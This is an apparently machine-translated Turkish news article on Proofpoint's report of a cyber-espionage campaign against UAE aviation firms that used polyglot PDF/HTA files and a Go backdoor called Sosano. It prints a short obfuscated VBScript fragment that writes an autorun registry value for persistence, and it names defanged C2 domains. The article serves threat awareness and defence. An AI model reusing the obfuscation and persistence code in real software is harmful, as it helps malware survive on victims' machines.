Proofpoint’teki güvenlik araştırmacıları, Birleşik Arap Emirlikleri’ndeki havacılık ve uydu iletişim organizasyonlarını hedefleyen sofistike bir siber casusluk kampanyası ortaya çıkardılar.
Unk_craftycamel olarak izlenen bir tehdit oyuncusuna atfedilen kampanya, 2024 sonbaharında beşten az kuruluşa yüksek derecede özelleştirilmiş kötü amaçlı yazılım sunmak için tehlikeye atılmış bir Hint elektronik şirketinden yararlandı.
Bu saldırı, tehdit aktörlerinin geleneksel güvenlik önlemlerini atlamak için güvenilir iş ilişkilerini kullandıkları tedarik zinciri uzlaşma tekniklerinde ilgili bir evrimi temsil ediyor.
Saldırganlar, her kurban için özel olarak özelleştirilmiş yemleri kullanarak, hedeflerle iş ilişkileri kuran tehlikeye atılan bir varlıktan kötü niyetli mesajlar gönderdi.
Bu mesajlar bir etki alanına bağlantılar içeriyordu (indicelectronics[.]Net) Meşru Indi Electronics Company’nin taklit edilmesi.
Mağdurlar bağlantıyı tıkladıklarında, elektronik şirketi ve ticaret fuarı katılımı hakkında bilgi de dahil olmak üzere iş belgeleri gibi görünen bir zip arşivi indirdiler.
Proofpoint araştırmacıları tarafından yapılan soruşturma, çok dilli dosyalar kullanan ayrıntılı bir çok aşamalı enfeksiyon zincirini ortaya çıkardı-tek bir dosyanın birden fazla dosya türü olarak yorumlanmasına izin veren nispeten nadir bir teknik.
Saldırı zinciri PDF dosyaları gibi görünen ancak aslında gizli yürütülebilir kod içeriyordu.
Bir dosya, eklenen bir HTA (HTML uygulaması) olan bir PDF idi, bir diğeri ise bir PDF’yi zip arşivi ile birleştirerek tehdit oyuncunun teknik sofistike ve tespitten kaçınma kararlılığını gösterdi.
.webp)
Kötü amaçlı yazılım dağıtım süreci, sonunda araştırmacılar tarafından “Sosano” olarak adlandırılan özel yapımlı bir GO Backdoor’un kurulmasına yol açtı. Bu arka kapı, gereksiz kod kütüphaneleri ile büyük ölçüde gizlendi ve otomatik algılama sistemlerinden kaçınmak için randomize uyku fonksiyonları da dahil olmak üzere çeşitli anti-analiz teknikleri kullandı.
Sosano arka kapısının analizi
Enfeksiyon zinciri önemli teknik karmaşıklık ortaya koydu. İlk yürütmeden sonra, bir LNK dosyası CMD.EXE’yi başlattı ve ardından PDF/HTA Polyglot dosyasını işlemek için MSHTA.EXE.
.webp)
HTA Orkestratör kodunun bir kısmı sofistike gizleme tekniklerini gösterir:-
Function nexttoday(uFP)
Dim WshShell
dim oo2
oo2 ="BXhwnuy.Xmjqq"
Set WshShell = CreateObject(today(oo2, 21))
On Error Resume Next
Dim fso1
fso1 = "MPJD_HZWWJSY_ZXJW\XTKYBFWJ\Rnhwtxtky\Bnsitbx\HzwwjsyAjwxnts\Wzs\RdZwqKnqj"
WshShell.RegWrite today(fso1, 21), uFP, "REG_SZ"
On Error GoTo 0
End Function%20(Source%20-%20ProofPoint).webp)
GO’da yazılmış Sosano Backdoor, komut ve kontrol sunucusuna bağlanır (Bokhoreshonline[.]com) talimat almak için.
Kötü amaçlı yazılım, dizin gezinmesi, dosya listesi, ek yükler indirme ve dizinleri kaldırma gibi çeşitli işlevleri gerçekleştirebilir.
Araştırmacılar, Backdoor’un altyapısının, meşru trafikle harmanlanması muhtemel ticari barındırma sağlayıcılarına karar verdiğini belirtti.
Bu kampanyanın yüksek hedefli doğası, kullanılan sofistike teknik önlemler ve BAE’deki kritik ulaşım altyapısına odaklanma, önemli yeteneklere ve belirli zeka toplama hedeflerine sahip bir tehdit aktörünü göstermektedir.
Proofpoint bu kampanyayı kesin olarak belirli bir ulus devlete bağlamamış olsa da, UNK_CRAFTYCAMEL’i ayrı bir varlık olarak değerlendirmelerine rağmen, İslami Devrimci Muhafız Kolordu şüpheli kampanyalarla bazı benzerlikler olduğunu belirttiler.
Kuruluşlar, yakın zamanda açılmamış dizinlerden yürütülen LNK dosyaları ve tarayıcı olmayan yürütülebilirleştirilebilirleri başlatan URL dosyaları da dahil olmak üzere, bu saldırı zinciriyle ilişkili olağandışı davranışları tespit etmek için önlemler uygulamalıdır.
Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free